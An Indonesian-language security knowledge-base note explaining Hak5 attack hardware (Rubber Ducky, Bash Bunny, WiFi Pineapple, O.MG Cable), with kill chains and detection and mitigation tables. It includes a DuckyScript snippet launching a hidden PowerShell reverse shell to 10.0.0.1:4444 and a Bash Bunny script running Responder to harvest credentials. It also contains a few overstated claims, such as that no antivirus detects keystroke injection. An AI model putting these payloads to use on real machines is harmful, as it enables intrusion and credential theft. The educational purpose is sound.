Konteks Etis & Legal

Perangkat Hak5 adalah alat pengujian keamanan fisik dan jaringan yang diproduksi oleh Hak5 LLC (AS). Alat-alat ini dirancang untuk penetration testing, red teaming, dan edukasi keamanan. Seluruh informasi di bawah berasal dari dokumentasi resmi Hak5, repositori GitHub komunitas, serta penelitian keamanan publik. Pembahasan ini murni edukasional dan defensif. Penggunaan terhadap sistem tanpa izin adalah ilegal. Tujuan: membekali defender dengan pemahaman mendalam tentang ancaman fisik dan cara mitigasinya.


🧬 Gambaran Umum Ekosistem Hak5

Hak5 memproduksi perangkat keras ofensif portabel yang mengeksploitasi kelemahan pada lapisan fisik dan antarmuka manusia (USB, WiFi, Ethernet). Berbeda dengan malware atau exploit software, alat Hak5 bekerja dengan menyamar sebagai perangkat tepercaya (keyboard, network adapter, charging cable) untuk mengirimkan payload atau mencuri data.

PerangkatForm FactorTarget UtamaMetode Serangan
USB Rubber DuckyUSB flash driveKomputer (Windows, macOS, Linux)Keyboard injection (keystroke payload)
Bash BunnyUSB flash drive (mini-computer)Komputer, jaringanMulti-stage attack: keyboard injection, network MITM, exfiltration
WiFi PineappleRouter portableWiFi client & APRogue Access Point, Evil Twin, deauth, captive portal, sniffing
O.MG CableKabel USB (Lightning/USB-C)Komputer, smartphoneKeyboard injection, data exfiltration, remote control via WiFi
Shark JackKabel Ethernet portabelJaringan kabelNetwork scanning, payload deployment via Ethernet
Packet SquirrelEthernet inline deviceJaringan kabelMan-in-the-Middle, VPN pivot, packet capture
LAN TurtleUSB Ethernet adapterKomputer, jaringanCovert remote access, DNS spoofing

πŸ¦† 1. USB Rubber Ducky β€” Keystroke Injection Device

Gambaran Umum

USB Rubber Ducky adalah keyboard injection tool yang menyamar sebagai USB HID (Human Interface Device) keyboard. Saat dicolokkan ke komputer, ia dikenali sebagai keyboard oleh OS dan mengetikkan payload dengan kecepatan superhuman (>900 karakter per detik). Karena OS mempercayai input keyboard sebagai tindakan pengguna, tidak ada antivirus atau EDR yang mendeteksi serangan ini.

Arsitektur Teknis

KomponenDetail
MikrokontrolerAtmel AT32UC3B (seri klasik) atau ARM Cortex-M3 (seri baru)
PenyimpananmicroSD card (payload + loot)
FirmwareDuckyScript interpreter
AntarmukaUSB-A (dikenali sebagai HID Keyboard)
Bahasa PayloadDuckyScript (sederhana, berbasis perintah)

DuckyScript β€” Bahasa Payload

REM Contoh payload: Reverse Shell via PowerShell
DELAY 1000
GUI r
DELAY 500
STRING powershell -NoP -NonI -W Hidden -Exec Bypass
ENTER
DELAY 500
STRING $client = New-Object System.Net.Sockets.TCPClient('10.0.0.1',4444);...
ENTER

Fitur DuckyScript:

  • DELAY β€” menunggu dalam milidetik
  • STRING β€” mengetik teks
  • GUI r β€” menekan Windows+R
  • CTRL/ALT/SHIFT β€” modifier keys
  • Variable & logic (versi 3.0+)

Kill Chain Rubber Ducky

  1. Delivery: Attacker mencolokkan Ducky ke port USB target (atau social engineering: β€œtolong colokkan flashdisk ini”).
  2. Enumeration: OS mengenali Ducky sebagai keyboard.
  3. Payload Execution: Ducky mengetikkan payload dengan kecepatan tinggi.
  4. Actions on Objective:
    • Reverse shell
    • Download & execute malware
    • Exfiltrasi file via DNS/HTTP
    • Buat admin account
    • Matikan antivirus/firewall

Varian & Evolusi

VarianKeunggulan
Rubber Ducky ClassicMurah, payload DuckyScript sederhana
Rubber Ducky 3.0ARM Cortex, DuckyScript 3.0, USB-C, stealth mode
DuckyScript 3.0Variables, functions, logic, encryption

🐰 2. Bash Bunny β€” Mini-Computer untuk Physical Attack

Gambaran Umum

Bash Bunny adalah komputer Linux portabel dalam form factor USB flash drive. Jika Rubber Ducky hanya bisa mengetik, Bash Bunny bisa:

  • Menyamar sebagai multiple devices secara simultan (keyboard + network adapter + serial + mass storage)
  • Menjalankan bash script penuh (tidak terbatas DuckyScript)
  • Melakukan Man-in-the-Middle via emulated Ethernet
  • Menyimpan loot di penyimpanan internal

Arsitektur Teknis

KomponenDetail
CPUARM Cortex-A7 (Allwinner R16)
RAM512 MB DDR3
PenyimpananmicroSD (payload) + internal flash
OSDebian Linux (custom)
AntarmukaUSB-A (composite device: keyboard + RNDIS + serial + mass storage)
Switch ModeFisik: posisi 1, 2, 3 (masing-masing bisa dikonfigurasi untuk payload berbeda)

Mode Serangan (Switch Positions)

PosisiMode DefaultFungsi
1RNDIS + HID + StorageNetwork MITM + keyboard injection + file access
2Serial-onlyDebug & recovery
3CustomizableBisa dikonfigurasi sesuai kebutuhan

Arsitektur Multi-Stage Attack

[Colokkan Bash Bunny]
        β”‚
        β–Ό
[Boot Linux dalam 5-10 detik]
        β”‚
        β–Ό
[Jalankan payload.txt di root]
        β”‚
        β”œβ”€β”€ ATTACKMODE RNDIS_ETHERNET HID STORAGE
        β”‚    (muncul sebagai Ethernet adapter + Keyboard + Flashdisk)
        β”‚
        β”œβ”€β”€ LED (status indicator)
        β”‚
        β”œβ”€β”€ RUN Linux commands:
        β”‚      - nmap scan jaringan
        β”‚      - Responder (LLMNR/NBT-NS poisoning)
        β”‚      - tcpdump (capture traffic)
        β”‚      - Metasploit payload
        β”‚      - Exfiltrasi file ke storage internal
        β”‚
        └── FINISH
             (LED hijau = sukses, merah = gagal)

Contoh Payload Bash Bunny (bash script)

#!/bin/bash
# Payload: Nmap scan + Responder untuk credential harvesting
ATTACKMODE RNDIS_ETHERNET HID STORAGE
LED R 100
# Konfigurasi IP
ifconfig usb0 10.0.0.1 netmask 255.255.255.0 up
# Jalankan Responder di background
responder -I usb0 -w -f &
# Jalankan nmap scan
nmap -sP 10.0.0.0/24 >> /root/udisk/loot/nmap_scan.txt
# Kirimkan hasil via keyboard ke notepad
LED G

🍍 3. WiFi Pineapple β€” Rogue Access Point & WiFi Attack Platform

Gambaran Umum

WiFi Pineapple adalah platform serangan WiFi terintegrasi yang dikembangkan oleh Hak5. Perangkat ini adalah router Linux portabel dengan software suite untuk:

  • Rogue Access Point (Evil Twin)
  • Deauthentication Attack
  • Captive Portal (phishing kredensial WiFi)
  • Man-in-the-Middle pada klien WiFi
  • Client Tracking (MAC address, probe requests)

Arsitektur Teknis

KomponenDetail
HardwareRouter portable (dual-radio: 2.4 GHz + 5 GHz)
OSOpenWrt-based (Pineapple OS)
AntarmukaWeb GUI (Pineapple Dashboard) + CLI (SSH)
ModulPineapple Modules (PineAP, Evil Portal, Deauth, dll.)

Modul Kunci

ModulFungsi
PineAPEngine inti: mengumpulkan probe requests, membuat rogue AP, tracking klien
Evil PortalCaptive portal phishing β€” meniru halaman login WiFi
DeauthMengirim deauthentication packets untuk memutuskan klien dari AP sah
Beacon ManagerMembuat puluhan SSID palsu (beacon flooding)
ReconPassive scanning: mengumpulkan MAC, SSID, dan probe request
PineAP SuiteKombinasi: Beacon Response, Probe Response, Association

Kill Chain WiFi Pineapple

  1. Recon (Pasif): Pineapple mengumpulkan probe requests dari perangkat di sekitar. Setiap perangkat yang mencari WiFi memancarkan SSID yang pernah diingat (contoh: β€œStarbucks WiFi”, β€œHomeNetwork”).
  2. Evil Twin: Pineapple membuat AP dengan SSID yang sama persis (dari probe request), tanpa password (atau dengan password yang sama jika diketahui).
  3. Deauth: Klien yang terhubung ke AP sah diputuskan dengan deauth packets, memaksa mereka reconnect.
  4. Association: Klien terhubung ke Evil Twin.
  5. Captive Portal: Klien disajikan halaman login palsu (contoh: β€œMasukkan password WiFi Anda”).
  6. Credential Harvesting: Kredensial disimpan.
  7. MITM: Setelah terhubung, semua traffic klien bisa dimonitor (jika tidak HTTPS/HSTS).

Penggunaan Defensif

WiFi Pineapple juga bisa digunakan untuk:

  • Audit keamanan WiFi organisasi
  • Deteksi Rogue AP di lingkungan korporat
  • Wireless Intrusion Detection (WIDS)
  • Pelatihan keamanan WiFi

πŸ”Œ 4. O.MG Cable β€” Kabel USB Berbahaya dengan Remote Access

Gambaran Umum

O.MG Cable adalah kabel USB yang mengandung implan komputer di dalam konektor USB-nya. Dari luar, ia tampak dan berfungsi seperti kabel pengisian daya/data biasa. Namun, di dalam konektor terdapat:

  • Microcontroller (ESP32-S2 atau sejenis)
  • WiFi chip (untuk remote control)
  • Penyimpanan (untuk payload)
  • Keylogger (opsional)

Kemampuan

FiturDetail
Keyboard InjectionMengetikkan payload via HID (seperti Rubber Ducky)
Remote Control via WiFiOperator bisa mengontrol kabel dari jarak jauh (WiFi access point sendiri)
Self-DestructBisa menghapus firmware sendiri untuk menghilangkan bukti
Data ExfiltrationMencuri file dari target, dikirim via WiFi
KeyloggingMerekam semua ketukan keyboard target
Transparent ModeKabel tetap berfungsi sebagai kabel data/charging normal (target tidak curiga)

Arsitektur

[Konektor USB-A] ─── [Kabel] ─── [Konektor USB-C/Lightning]
       β”‚                              β”‚
       β”‚                              β”œβ”€β”€ Implan ESP32-S2
       β”‚                              β”‚     β”œβ”€β”€ WiFi chip
       β”‚                              β”‚     β”œβ”€β”€ Flash storage
       β”‚                              β”‚     β”œβ”€β”€ HID emulator
       β”‚                              β”‚     └── Keylogger
       β”‚                              β”‚
       └── Data/Charging pass-through β”€β”€β”˜

Kill Chain O.MG Cable

  1. Delivery: Target diberikan kabel β€œgratis” (konferensi, hotel, social engineering).
  2. Connection: Target menggunakan kabel untuk mengisi daya atau transfer data (fungsi normal tetap bekerja).
  3. Remote Control: Attacker terhubung ke WiFi O.MG Cable dari jarak dekat (5-10 meter).
  4. Payload Execution: Attacker mengirimkan payload keyboard injection via WiFi.
  5. Exfiltration: File dicuri dan dikirim via WiFi.
  6. Cleanup: Attacker mengaktifkan self-destruct untuk menghapus firmware berbahaya.

Varian

VarianKonektor
O.MG Cable EliteUSB-A ke Lightning (iOS)
O.MG Cable USB-CUSB-A ke USB-C (Android, laptop modern)
O.MG Cable USB-AUSB-A ke USB-A (legacy)

πŸ›‘οΈ Deteksi & Countermeasures

1. Terhadap USB Rubber Ducky & Bash Bunny

MetodeDetail
USB Port ControlBlokir USB mass storage dan HID yang tidak sah via Group Policy atau endpoint DLP.
Device AllowlistingHanya izinkan VID/PID (Vendor ID/Product ID) keyboard/mouse yang disetujui.
Behavioral DetectionMonitor keystroke rate: keyboard manusia maksimal ~60 WPM; Ducky >900 WPM.
USBGuard (Linux)Software yang memblokir perangkat USB yang tidak dikenal.
Physically Secure PortsTutup port USB yang tidak digunakan dengan port lock atau epoxy.
Disable Unused USB in BIOSMatikan port USB di BIOS untuk workstation sensitif.

2. Terhadap WiFi Pineapple

MetodeDetail
802.11w (Protected Management Frames)Mencegah deauthentication attack.
Wireless Intrusion Detection (WIDS)Deteksi rogue AP dan deauth flood.
Client IsolationAP sah harus mengisolasi klien satu sama lain.
Edukasi PenggunaWaspada terhadap captive portal yang meminta password WiFi.
VPNGunakan VPN untuk melindungi traffic meskipun terhubung ke Evil Twin.

3. Terhadap O.MG Cable

MetodeDetail
Gunakan Kabel SendiriJangan pernah menerima kabel dari sumber tidak dikenal.
USB Data BlockerGunakan β€œUSB condom” (data blocker) untuk hanya mengizinkan charging, bukan data.
Inspect KabelPeriksa konektor USB untuk tonjolan atau berat yang tidak normal.
WiFi ScanningO.MG Cable memancarkan SSID WiFi; bisa dideteksi dengan WiFi scanner.

↔️ Dual-Use Spectrum

DEFENSE ◄──────────────────────────────────────────► OFFENSE

Red Team                  Physical Pentest         Insider Threat
β”‚                         β”‚                        β”‚
Menguji keamanan          Menunjukkan              Menanamkan Bash
fisik dan respons         celah fisik              Bunny untuk akses
SOC terhadap              kepada klien             persisten ke
serangan fisik            β”‚                        jaringan internal
β”‚                         β”‚                        β”‚
β”‚                         β–Ό                        β–Ό
β–Ό                         Social engineering       Spionase industri,
Security awareness        awareness                pencurian data
training

πŸ”— Koneksi dalam Vault

  • metasploit β€” Bash Bunny bisa menjalankan payload Metasploit (reverse shell, meterpreter).
  • Cobalt Strike β€” Payload keyboard injection bisa mengirimkan stager Cobalt Strike.
  • empire β€” PowerShell payload bisa diketikkan via Rubber Ducky / O.MG Cable.
  • WiFi-Bluetooth-Sniffing β€” WiFi Pineapple adalah alat utama untuk sniffing WiFi.
  • Stingray β€” Sama-sama alat taktis lapangan untuk intercept; IMSI Catcher untuk cellular, WiFi Pineapple untuk WiFi.
  • Social Engineering β€” Semua alat Hak5 sangat bergantung pada social engineering untuk delivery.

πŸ“š Referensi

  • Hak5. Official Documentation: Bash Bunny, WiFi Pineapple, O.MG Cable, Rubber Ducky. https://hak5.org
  • Hak5 GitHub. Payload Library & Community Scripts.
  • O.MG Cable. Technical Specifications & Schematics. https://o.mg.lol
  • MITRE ATT&CK: T1200 (Hardware Additions), T1056.001 (Input Capture: Keylogging), T1557 (Adversary-in-the-Middle).

Hak5 Suite Deep Dive | Physical Red Team Hardware | USB, WiFi, & Cable Attack Platform